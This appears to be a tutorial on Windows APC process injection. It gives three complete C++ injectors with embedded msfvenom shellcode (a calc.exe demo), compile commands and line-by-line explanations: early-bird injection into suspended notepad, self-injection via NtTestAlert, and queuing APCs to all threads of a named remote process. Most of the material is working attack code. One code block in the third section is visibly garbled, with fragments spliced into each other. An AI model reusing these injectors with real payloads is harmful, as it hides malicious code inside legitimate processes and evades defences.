What is APC Injection?

  • Every thread in a Windows process has a private list (or queue) where APC (Asynchronous Procedure Call) functions can be stored, waiting to be executed.
  • If a program wants a thread to run some extra code (an APC), it calls the QueueUserAPC function to add that APC to the target thread’s queue.
  • When calling QueueUserAPC, the program must tell it which function to execute (by giving the function’s memory address or pointer).
  • This just means that by adding the APC to the thread’s queue, you’re asking the thread to run that function, but it won’t happen right away. It only happens when the thread enters an alertable wait state (e.g., using SleepEx() or WaitForSingleObjectEx() with alertable flag).

Simple Technique


Code

//ACPInjection.cpp
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
 
// calc.exe payload
unsigned char my_payload[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
int main() {
	// Create a 64-bit process:
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	LPVOID my_payload_mem;
	SIZE_T my_payload_len = sizeof(my_payload);
	LPCWSTR cmd;
	HANDLE hProcess, hThread;
	NTSTATUS status;
	
	ZeroMemory(&si, sizeof(si));
	ZeroMemory(&pi, sizeof(pi));
	si.cb = sizeof(si);
	
	CreateProcessA("C:\\Windows\\System32\\notepad.exe", NULL, NULL, NULL, false, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
	WaitForSingleObject(pi.hProcess, 5000);
	hProcess = pi.hProcess;
	hThread = pi.hThread;
	
	// allocate a memory buffer for payload
	my_payload_mem = VirtualAllocEx(hProcess, NULL, my_payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	
	// write payload to allocated buffer
	WriteProcessMemory(hProcess, my_payload_mem, my_payload, my_payload_len, NULL);
	
	// inject into the suspended thread.
	PTHREAD_START_ROUTINE apc_r = (PTHREAD_START_ROUTINE)my_payload_mem;
	QueueUserAPC((PAPCFUNC)apc_r, hThread, 0);
	
	// resume to suspended thread
	ResumeThread(hThread);
	
	return 0;
}

Explanation

#include <windows.h>

windows.h is a Windows-specific header file that lets your program use the Windows API — which is a massive collection of functions Microsoft provides for doing stuff on Windows.


#include <stdio.h>

<stdio.h> stands for Standard Input Output Header in C and C++.

It provides functions for basic input and output, like:

FunctionWhat It Does
printfPrint to console
scanfRead from user input
fopenOpen a file
freadRead data from a file
fwriteWrite data to a file
fcloseClose a file

#include <stdlib.h>

<stdlib.h> stands for Standard Library header in C/C++. It gives you access to general-purpose utility functions — especially for:

CategoryExample FunctionsPurpose
Memorymalloc, free, reallocDynamic memory allocation
Process controlexit, system, abortTerminate program or run commands
Conversionsatoi, atof, strtolConvert strings to numbers
Randomrand, srandGenerate random numbers

unsigned char my_payload[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"; 
  • Shellcode that runs calc.exe in CMD.
  • Generated with command :
    msfvenom -p windows/x64/exec CMD=calc.exe -f c

STARTUPINFO si;
PROCESS_INFORMATION pi;
  • STARTUPINFO si: Structure used to specify window appearance and handle inheritance for the new process.
  • PROCESS_INFORMATION pi: Structure to receive info about the created process (process handle, thread handle, etc).

LPVOID my_payload_mem;
SIZE_T my_payload_len = sizeof(my_payload);
  • LPVOID my_payload_mem: Pointer for memory allocated in the target process.
  • SIZE_T my_payload_len = sizeof(my_payload);: Gets the size of the shellcode payload.

LPCWSTR cmd;
HANDLE hProcess, hThread;
NTSTATUS status;
  • LPCWSTR cmd: It would typically hold a wide string (Unicode) command.
  • HANDLE hProcess, hThread: Handles to the created process and thread.
  • NTSTATUS status: Variable for returning status (For error checking).

ZeroMemory(&si, sizeof(si));
ZeroMemory(&pi, sizeof(pi));
  • ZeroMemory(...): Sets all fields of the structures to 0 to avoid garbage values.

si.cb = sizeof(si);
  • si.cb: Specifies the size of the STARTUPINFO structure (required by CreateProcess).

CreateProcessA(
  "C:\\Windows\\System32\\notepad.exe", // application to run
  NULL,                                 // command line (no args)
  NULL, NULL,                           // no process/thread security attributes
  false,                                // do not inherit handles
  CREATE_SUSPENDED,                     // start the process in suspended mode
  NULL, NULL,                           // no environment, current directory
  &si, &pi                              // startup info, process info
);
  • CreateProcessA: Creates a new process in suspended mode (so we can inject shellcode before it runs).
  • The target: "notepad.exe" is a harmless process often used in injection demos.
  • CREATE_SUSPENDED: Ensures the main thread is paused right after creation.

WaitForSingleObject(pi.hProcess, 5000);
  • Waits up to 5 seconds for the process to reach a waitable state.
  • Here, it’s redundant because the process is already suspended.

hProcess = pi.hProcess;
hThread = pi.hThread;
  • Stores the handles to the process and primary thread for later use.

my_payload_mem = VirtualAllocEx(
  hProcess, NULL, my_payload_len,
  MEM_COMMIT | MEM_RESERVE,
  PAGE_EXECUTE_READWRITE
);
  • VirtualAllocEx: Allocates memory inside the target process.
  • MEM_COMMIT | MEM_RESERVE: Reserves and commits memory.
  • PAGE_EXECUTE_READWRITE: Memory is readable, writable, and executable, so shellcode can run from it.

WriteProcessMemory(
  hProcess,
  my_payload_mem,    // destination in target process
  my_payload,        // source shellcode
  my_payload_len,
  NULL               // optional: bytes written (not needed here)
);
  • Injects the shellcode into the allocated memory of the notepad.exe process.

PTHREAD_START_ROUTINE apc_r = (PTHREAD_START_ROUTINE)my_payload_mem;
QueueUserAPC((PAPCFUNC)apc_r, hThread, 0);
  • PTHREAD_START_ROUTINE: A function pointer type for thread entry functions.
  • QueueUserAPC(...): Queues the shellcode (as an APC) to be executed when the thread enters an alertable state (which happens on resume).

ResumeThread(hThread);
  • Resumes the main thread of notepad.exe, which now executes the queued shellcode.

Compile

x86_64-w64-mingw32-gcc ACPInjection.cpp -o ACPInjection.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

Run

On windows 7 x64:

.\ACPInjection.exe


With NtTestAlert

  • NtTestAlert is a undocumented function.
  • NtTestAlert is a system call that’s related to the alerts mechanism of Windows. This system call can cause execution of any pending APCs the thread has. Before a thread starts executing it’s Win32 start address it calls NtTestAlert to execute any pending APCs.

Code

//nttestalert.cpp
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "ntdll")
using myNtTestAlert = NTSTATUS(NTAPI*)();
 
// calc.exe payload
unsigned char my_payload[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
int main(int argc, char* argv[]) {
	SIZE_T my_payload_len = sizeof(my_payload);
	HMODULE hNtdll = GetModuleHandleA("ntdll");
	myNtTestAlert testAlert = (myNtTestAlert)(GetProcAddress(hNtdll, "NtTestAlert"));
	
	LPVOID my_payload_mem = VirtualAlloc(NULL, my_payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	
	WriteProcessMemory(GetCurrentProcess(), my_payload_mem, my_payload, my_payload_len, NULL);
	
	PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)my_payload_mem;
	
	QueueUserAPC((PAPCFUNC)apcRoutine,GetCurrentThread(), 0);
	
	testAlert();
	
	return 0;
}

Explanation

#include <windows.h>   // Windows API functions (e.g., VirtualAlloc, QueueUserAPC, etc.)
#include <stdio.h>     // Standard I/O (not used, but included)
#include <stdlib.h>    // Standard library (not used, but included)
#include <string.h>    // For string functions (not used here)
#pragma comment(lib, "ntdll") 
  • Tells the MSVC linker to link against the ntdll.lib file a static import library for the Windows NT Layer DLL ntdll.dll.

using myNtTestAlert = NTSTATUS(NTAPI*)();

Defines a custom type myNtTestAlert which is a function pointer to a function that:

  • returns NTSTATUS
  • takes no arguments
  • uses the NTAPI calling convention (same as stdcall on Windows)

unsigned char my_payload[] = "\xfc\x48..."; 
  • This is raw shellcode that launches calc.exe.
  • Generated with command :
    msfvenom -p windows/x64/exec CMD=calc.exe -f c

int main(int argc, char* argv[]) {
  • Standard C entry point. Accepts command-line arguments.

SIZE_T my_payload_len = sizeof(my_payload);
  • Stores the size of the payload into my_payload_len.

HMODULE hNtdll = GetModuleHandleA("ntdll");
  • Retrieves a module handle (pointer) to ntdll.dll, which contains low-level NT APIs (like NtTestAlert).

myNtTestAlert testAlert = (myNtTestAlert)(GetProcAddress(hNtdll, "NtTestAlert"));
  • Uses GetProcAddress to find the memory address of the undocumented NtTestAlert function.
  • Casts it to the correct function pointer type (myNtTestAlert) and stores it in testAlert.

🧠 What does NtTestAlert do?

  • It causes a thread to check its APC queue and process any pending APCs.
  • By default, threads only check APCs when alertable waits happen.
  • NtTestAlert() forces that check — that’s the key trick here.

LPVOID my_payload_mem = VirtualAlloc(NULL, my_payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  • Allocates memory with RWX permissions (which is suspicious to AV) and stores the pointer to my_payload_mem.

WriteProcessMemory(GetCurrentProcess(), my_payload_mem, my_payload, my_payload_len, NULL);
  • Writes the shellcode into the current process’s memory space (you’re injecting into yourself).
  • Technically unnecessary here memcpy() would suffice, but this mimics the remote injection pattern.

PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)my_payload_mem;
  • Defines a pointer to a function that takes LPVOID and returns DWORD, the expected signature for an APC function.

QueueUserAPC((PAPCFUNC)apcRoutine, GetCurrentThread(), NULL);
  • Schedules your shellcode as an APC on your own thread.
  • But it won’t run immediately, it just gets queued.

testAlert(); 
  • This function forces the thread to check and execute any pending APCs including your shellcode.
  • This is the moment the shellcode runs and launches calc.exe.

Compile

x86_64-w64-mingw32-g++ -O2 nttestalert.cpp -o nttestalert.exe -mconsole -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive

Run

.\nttestalert.exe

\

Alertable threads

Here, we are going to see APC injection in remote threads.

  • Inject APC into all of the target process threads, since we can’t tell which ones are alertable. We just hope at least one of them is, so our code runs.

Steps:

  1. Find the target process id.
  2. Allocate space in the target process for our payload.
  3. Write payload in the allocated space.
  4. Find target process threads.
  5. Queue an APC to all of them to execute our payload.

Code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <tlhelp32.h>
#include <vector>
unsigned char my_payload[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00,
0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2,
0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48,
0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7,
0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c,
0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52,
0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88,
0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01,
0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49,
0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34,
0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0,
0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1,
0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0,
0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49,
0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41,
0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0,
0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff,
0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00,
0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0,
0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80,
0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a,
0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c,
0x63, 0x2e, 0x65, 0x78, 0x65, 0x00};
unsigned int my_payload_len = sizeof(my_payload);
 
int findMyProc(const char *procname) {
	HANDLE hSnapshot;
	PROCESSENTRY32 pe;
	int pid = 0;
	BOOL hResult;
	
	// snapshot of all processes in the system
	hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (INVALID_HANDLE_VALUE == hSnapshot) return 0;
	
	// initializing size: needed for using Process32First
	pe.dwSize = sizeof(PROCESSENTRY32);
	
	// info about first process encountered in a system snapshot
	hResult = Process32First(hSnapshot, &pe);
	
	// retrieve information about the processes
	// and exit if unsuccessful
	while (hResult) {
		// if we find the process: return process ID
		if (strcmp(procname, pe.szExeFile) == 0) {
			pid = pe.th32ProcessID;
			break;
		}
		hResult = Process32Next(hSnapshot, &pe);
	}
	
	// closes an open handle (CreateToolhelp32Snapshot)
	CloseHandle(hSnapshot);
	return pid;
}
DWORD getTids(DWORD pid, std::vector<DWORD>& tids) {
	HANDLE hSnapshot;
	THREADENTRY32 te;
	te.dwSize = sizeof(THREADENTRY32);
	hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, NULL);
	if (Thread32First(hSnapshot, &te)) {
		do {
			if (pid == te.th32OwnerProcessID) {
				tids.push_back(te.th32ThreadID);
			}
		} while (Thread32Next(hSnapshot, &te));
	}
	CloseHandle(hSnapshot);
	return !tids.empty();
}
int main(int argc, char* argv[]) {
	DWORD pid = 0; // process ID
	HANDLE ph; // process handle
	HANDLE ht; // thread handle
	LPVOID rb; // remote buffer
	std::vector<DWORD> tids; // thread IDs
	pid = findMyProc(argv[1]);
	if (pid == 0) {
		printf("PID not found :( exiting...\n");
		return -1;
	} else {
		printf("PID = %d\n", pid);
		ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, (DWORD)pid);
		if (ph == NULL) {
			printf("OpenProcess failed! exiting...\n");
			return -2;
		}
		
	// allocate memory buffer for remote process
	rb = VirtualAllocEx(ph, NULL, my_payload_len, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
		
	// write payload to memory buffer
	WriteProcessMemory(ph, rb, my_payload, my_payload_len, NULL);
	if (getTids(pid, tids)) {
		for (DWORD tid : tids) { 
			HANDLE ht = OpenThread(THREAD_SET_CONTEXT, FALSE, tid);
			if (ht) {
				QueueUserAPC((PAPCFUNC)rb, ht, 0);
				printf("payload injected via QueueUserAPC\n");
				CloseHandle(ht);
			}
		}
	}
	CloseHandle(ph);
}
return 0;
}

Explanation

#include <stdio.h>
  • Purpose: Includes the Standard Input/Output header.
  • Allows us to use functions like printf(), scanf(), etc.

#include <stdlib.h>
  • Purpose: Includes the Standard Library header.
  • Lets us use functions like malloc(), free(), exit(), system(), etc.

#include <string.h>
  • Purpose: Includes functions for handling C-style strings.
  • We can use strcpy(), strcmp(), strlen(), etc.

#include <windows.h>
  • Purpose: Gives you access to the Windows API.
  • Includes functions and definitions to interact with Windows OS (like creating processes, threads, memory handling, etc).

#include <tlhelp32.h>
  • Purpose: Includes definitions for Tool Help APIs.
  • We can use it to take snapshots of running processes, threads, and modules.
  • Useful for process injection, enumeration, etc.

#include <vector>
  • Purpose: Gives access to C++ STL vectors.
  • A vector is like a dynamic array that grows as you add elements.

unsigned char my_payload[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00,
0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2,
0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48,
0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7,
0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c,
0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52,
0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88,
0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01,
0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49,
0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34,
0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0,
0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1,
0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0,
0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49,
0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41,
0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0,
0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff,
0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00,
0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0,
0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80,
0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a,
0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c,
0x63, 0x2e, 0x65, 0x78, 0x65, 0x00
};
  • Shellcode that runs calc.exe in CMD.
  • Generated with command :
    msfvenom -p windows/x64/exec CMD=calc.exe -f c

unsigned int my_payload_len = sizeof(my_payload);

It calculates the total size (in bytes) of your my_payload array and stores that number into my_payload_len.

  • This line gets the size of the my_payload array.
  • It saves that size in my_payload_len.
  • Later, the program uses my_payload_len when allocating memory, copying the payload, and setting memory protections.

int findMyProc(const char *procname) {
	HANDLE hSnapshot;
	PROCESSENTRY32 pe;
	int pid = 0;
	BOOL hResult;
	
	// snapshot of all processes in the system
	hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (INVALID_HANDLE_Vz=nt findMyProc(const char *procname) {
	HANDLE hSnapshot;
	PROCESSENTRY32 pe;int findMyProc(const char *procname) {
	HANDLE hSnapshot;
	PROCESSENTRY32 pe;
	int pid = 0;
	int pid = 0;int findMyProc(const char *procname) {
	HANDLE hSnapshot;
	PROCESSENTRY32 pe;
	int pid = 0;LUE == hSnapshot) return 0;
	
	// initializing size:int findMyProc(const char *procname) {
	HANDLE hSnapshot;
	PROCESSENTRY32 pe;
	int pid = 0; needed for using Process32First
	pe.dwSize = sizeof(PROCESSENTRY32);
	
	// info about first process encountered in a system snapshot
	hResult = Process32First(hSnapshot, &pe);
	
	// retrieve information about the processes
	// and exit if unsuccessful
	while (hResult) {
		// if we find the process: return process ID
		if (strcmp(procname, pe.szExeFile) == 0) {
			pid = pe.th32ProcessID;
			break;
		}
		hResult = Process32Next(hSnapshot, &pe);
	}
	
	// closes an open handle (CreateToolhelp32Snapshot)
	CloseHandle(hSnapshot);
	return pid;
}

Refer to, Tricks for explanation for this part of code.


DWORD getTids(DWORD pid, std::vector<DWORD>& tids) {
	HANDLE hSnapshot;
	THREADENTRY32 te;
	te.dwSize = sizeof(THREADENTRY32);
	hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, NULL);
	if (Thread32First(hSnapshot, &te)) {
		do {
			if (pid == te.th32OwnerProcessID) {
				tids.push_back(te.th32ThreadID);
			}
		} while (Thread32Next(hSnapshot, &te));
	}
	CloseHandle(hSnapshot);
	return !tids.empty();
}
DWORD getTids(DWORD pid, std::vector<DWORD>& tids)
  • DWORD pid: This is the Process ID (PID) of the target process you’re interested in.
  • std::vector<DWORD>& tids: This is a reference to a vector, where the function will store all the Thread IDs (TIDs) belonging to the process.
  • The function returns a non-zero (true) value if it finds at least one thread for the given PID, or zero (false) if not.

HANDLE hSnapshot;
THREADENTRY32 te;
te.dwSize = sizeof(THREADENTRY32);
  • hSnapshot: This is a handle to a snapshot of all threads in the system.
  • THREADENTRY32 te: This structure will hold information about each thread.
  • te.dwSize = sizeof(THREADENTRY32); is required before calling Thread32First() or Thread32Next() to tell the system the size of the structure.

hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, NULL);
  • This takes a snapshot of all threads currently running in the system.
  • TH32CS_SNAPTHREAD is the flag used to say: “I want a snapshot of threads.”

if (Thread32First(hSnapshot, &te)) {
    do {
        if (pid == te.th32OwnerProcessID) {
            tids.push_back(te.th32ThreadID);
        }
    } while (Thread32Next(hSnapshot, &te));
}
  • Thread32First() gets info about the first thread.
  • The loop (do { ... } while (...)) keeps going through all threads in the system.
    Inside the loop:
  • if (pid == te.th32OwnerProcessID) checks if this thread belongs to the process we care about (matches PID).
  • If yes, it adds the thread ID to the tids vector.

CloseHandle(hSnapshot);
  • Closes the snapshot handle to free system resources.

return !tids.empty();
  • If tids is not empty, that means we found at least one thread so return true (non-zero).
  • If tids is empty, return false (0).

int main(int argc, char* argv[]) {
	DWORD pid = 0; // process ID
	HANDLE ph; // process handle
	HANDLE ht; // thread handle
	LPVOID rb; // remote buffer
	std::vector<DWORD> tids; // thread IDs
	pid = findMyProc(argv[1]);
	if (pid == 0) {
		printf("PID not found :( exiting...\n");
		return -1;
	} else {
		printf("PID = %d\n", pid);
		ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, (DWORD)pid);
		if (ph == NULL) {
			printf("OpenProcess failed! exiting...\n");
			return -2;
		}
		
	// allocate memory buffer for remote process
	rb = VirtualAllocEx(ph, NULL, my_payload_len, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
		
	// write payload to memory buffer
	WriteProcessMemory(ph, rb, my_payload, my_payload_len, NULL);
	if (getTids(pid, tids)) {
		for (DWORD tid : tids) { 
			HANDLE ht = OpenThread(THREAD_SET_CONTEXT, FALSE, tid);
			if (ht) {
				QueueUserAPC((PAPCFUNC)rb, ht, NULL);
				printf("payload injected via QueueUserAPC\n");
				CloseHandle(ht);
			}
		}
	}
	CloseHandle(ph);
}
int main(int argc, char* argv[]) {
  • Entry point of the program. Takes command-line arguments (e.g., target.exe).
DWORD pid = 0; // process ID
HANDLE ph;     // process handle
HANDLE ht;     // thread handle
LPVOID rb;     // remote buffer (where shellcode is injected)
std::vector<DWORD> tids; // will store all thread IDs of the target process
  • These are variables to store:
    • The process ID (pid)
    • Handles to the process and threads
    • A pointer to memory in the remote process
